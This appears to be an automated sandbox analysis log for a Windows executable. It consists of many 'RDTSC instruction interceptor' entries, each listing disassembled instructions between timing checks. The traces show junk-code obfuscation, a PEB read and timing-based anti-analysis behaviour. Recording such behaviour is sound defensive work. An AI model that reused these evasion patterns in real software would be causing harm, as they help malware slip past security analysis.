Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 12288AA second address: 12288C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F78B909B0FAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 12288C3 second address: 12288C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0081 second address: 71F0097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0097 second address: 71F009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F009B second address: 71F00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F00A1 second address: 71F00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F00A7 second address: 71F00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F00AB second address: 71F00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F00BB second address: 71F00C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F00C1 second address: 71F01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F78B9095CF2h 0x00000008 mov ecx, 5ED9D5F1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 pushad 0x00000017 mov bx, si 0x0000001a mov edx, eax 0x0000001c popad 0x0000001d sub esp, 18h 0x00000020 jmp 00007F78B9095CF0h 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F78B9095CF0h 0x0000002b push eax 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F78B9095CF1h 0x00000033 sub cl, FFFFFF96h 0x00000036 jmp 00007F78B9095CF1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F78B9095CF0h 0x00000042 sbb ecx, 461CD8B8h 0x00000048 jmp 00007F78B9095CEBh 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F78B9095CEBh 0x00000059 adc al, 0000007Eh 0x0000005c jmp 00007F78B9095CF9h 0x00000061 popfd 0x00000062 pushfd 0x00000063 jmp 00007F78B9095CF0h 0x00000068 sbb ch, 00000078h 0x0000006b jmp 00007F78B9095CEBh 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F01AA second address: 71F0220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B909B0FFh 0x00000009 add eax, 3247D53Eh 0x0000000f jmp 00007F78B909B109h 0x00000014 popfd 0x00000015 call 00007F78B909B100h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebx, dword ptr [eax+10h] 0x00000021 jmp 00007F78B909B101h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007F78B909B103h 0x0000002f movzx ecx, bx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0220 second address: 71F0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0226 second address: 71F022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F022A second address: 71F02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F78B9095CECh 0x00000014 sbb esi, 137F9E28h 0x0000001a jmp 00007F78B9095CEBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 jmp 00007F78B9095CF7h 0x00000029 popad 0x0000002a mov esi, dword ptr [772406ECh] 0x00000030 jmp 00007F78B9095CF6h 0x00000035 test esi, esi 0x00000037 pushad 0x00000038 mov edi, ecx 0x0000003a call 00007F78B9095CEAh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F02A7 second address: 71F0330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jne 00007F78B909BF9Bh 0x0000000c pushad 0x0000000d mov cl, dh 0x0000000f push esi 0x00000010 jmp 00007F78B909B105h 0x00000015 pop esi 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F78B909B0FCh 0x0000001d mov dword ptr [esp], edi 0x00000020 jmp 00007F78B909B100h 0x00000025 call dword ptr [77210B60h] 0x0000002b mov eax, 766BE5E0h 0x00000030 ret 0x00000031 jmp 00007F78B909B100h 0x00000036 push 00000044h 0x00000038 jmp 00007F78B909B100h 0x0000003d pop edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F78B909B107h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0330 second address: 71F0354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0354 second address: 71F0367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0367 second address: 71F038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F038B second address: 71F038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F038F second address: 71F0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0393 second address: 71F0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0399 second address: 71F039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F039F second address: 71F03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F03A3 second address: 71F03A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F041E second address: 71F0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0424 second address: 71F0475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov cx, 8C8Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 mov edx, eax 0x00000014 popad 0x00000015 test esi, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F78B9095CF4h 0x0000001e adc ecx, 6C05EF68h 0x00000024 jmp 00007F78B9095CEBh 0x00000029 popfd 0x0000002a mov esi, 11BEE15Fh 0x0000002f popad 0x00000030 je 00007F7929064F25h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0475 second address: 71F0479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0479 second address: 71F047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F047D second address: 71F0483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0483 second address: 71F04BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B9095CF4h 0x00000009 and cx, ACF8h 0x0000000e jmp 00007F78B9095CEBh 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F04BD second address: 71F04C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F04C1 second address: 71F04C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F04C7 second address: 71F04D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B0FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F04D6 second address: 71F04DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F04DA second address: 71F04F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F78B909B100h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F04F6 second address: 71F052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F78B9095CF6h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F78B9095CEAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F052F second address: 71F0535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0535 second address: 71F057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c mov cx, di 0x0000000f mov edi, 38C0DF42h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebx+4Ch] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F78B9095CF5h 0x00000021 xor cx, 2F16h 0x00000026 jmp 00007F78B9095CF1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F057D second address: 71F05C3 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 2Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F78B909B103h 0x0000000c call 00007F78B909B108h 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esi+10h], eax 0x00000017 pushad 0x00000018 mov al, dh 0x0000001a mov bh, ah 0x0000001c popad 0x0000001d mov eax, dword ptr [ebx+50h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F05C3 second address: 71F05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F05CA second address: 71F05D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F05D0 second address: 71F05D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F05D4 second address: 71F05D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F05D8 second address: 71F062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e popad 0x0000000f mov eax, dword ptr [ebx+54h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F78B9095CF7h 0x00000019 sbb cl, 0000006Eh 0x0000001c jmp 00007F78B9095CF9h 0x00000021 popfd 0x00000022 mov bl, ah 0x00000024 popad 0x00000025 mov dword ptr [esi+18h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F062C second address: 71F0630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0630 second address: 71F0634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0634 second address: 71F063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F063A second address: 71F063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F063F second address: 71F067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B103h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+58h] 0x0000000f jmp 00007F78B909B106h 0x00000014 mov dword ptr [esi+1Ch], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F067C second address: 71F0681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0681 second address: 71F0722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007F78B909B100h 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 jmp 00007F78B909B100h 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov ebx, eax 0x00000020 mov ah, 1Ch 0x00000022 popad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F78B909B0FBh 0x0000002a adc cl, FFFFFFFEh 0x0000002d jmp 00007F78B909B109h 0x00000032 popfd 0x00000033 call 00007F78B909B100h 0x00000038 pop eax 0x00000039 popad 0x0000003a popad 0x0000003b mov dword ptr [esi+24h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F78B909B103h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0722 second address: 71F073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F073F second address: 71F0745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0745 second address: 71F0749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0749 second address: 71F075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F075A second address: 71F075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F075E second address: 71F0764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F0764 second address: 71F077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CF6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 71F077E second address: 71F07B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e jmp 00007F78B909B106h 0x00000013 mov eax, dword ptr [ebx+68h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edi, 201C4290h 0x0000001e mov dh, F7h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F07B6 second address: 71F07C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F07C8 second address: 71F07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F07CC second address: 71F08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b jmp 00007F78B9095CF7h 0x00000010 mov ax, word ptr [ebx+6Ch] 0x00000014 pushad 0x00000015 movzx ecx, dx 0x00000018 mov dx, 38E4h 0x0000001c popad 0x0000001d mov word ptr [esi+30h], ax 0x00000021 pushad 0x00000022 call 00007F78B9095CF9h 0x00000027 pushfd 0x00000028 jmp 00007F78B9095CF0h 0x0000002d jmp 00007F78B9095CF5h 0x00000032 popfd 0x00000033 pop esi 0x00000034 movsx edx, ax 0x00000037 popad 0x00000038 mov ax, word ptr [ebx+00000088h] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F78B9095CF6h 0x00000046 jmp 00007F78B9095CF5h 0x0000004b popfd 0x0000004c mov di, si 0x0000004f popad 0x00000050 mov word ptr [esi+32h], ax 0x00000054 pushad 0x00000055 mov edx, esi 0x00000057 jmp 00007F78B9095CF4h 0x0000005c popad 0x0000005d mov eax, dword ptr [ebx+0000008Ch] 0x00000063 jmp 00007F78B9095CF0h 0x00000068 mov dword ptr [esi+34h], eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F78B9095CF7h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08CC second address: 71F08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08D2 second address: 71F08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08D6 second address: 71F08DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08DA second address: 71F0939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F78B9095CEDh 0x00000012 xor cl, 00000066h 0x00000015 jmp 00007F78B9095CF1h 0x0000001a popfd 0x0000001b mov edi, eax 0x0000001d popad 0x0000001e mov dword ptr [esi+38h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F78B9095CEFh 0x0000002a jmp 00007F78B9095CF3h 0x0000002f popfd 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0939 second address: 71F0964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0964 second address: 71F09F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B9095CF7h 0x00000009 or ch, 0000000Eh 0x0000000c jmp 00007F78B9095CF9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F78B9095CF0h 0x00000018 sub cl, FFFFFF88h 0x0000001b jmp 00007F78B9095CEBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esi+3Ch], eax 0x00000027 jmp 00007F78B9095CF6h 0x0000002c mov eax, dword ptr [ebx+20h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F78B9095CF7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F09F4 second address: 71F0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0A23 second address: 71F0A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1F6CB2F9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+00000080h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edi, ax 0x00000017 call 00007F78B9095CEAh 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0A46 second address: 71F0A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B909B0FEh 0x00000009 jmp 00007F78B909B105h 0x0000000e popfd 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F78B909B109h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0A90 second address: 71F0AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F78B9095CF3h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 mov dx, 11CAh 0x00000018 rdtsc
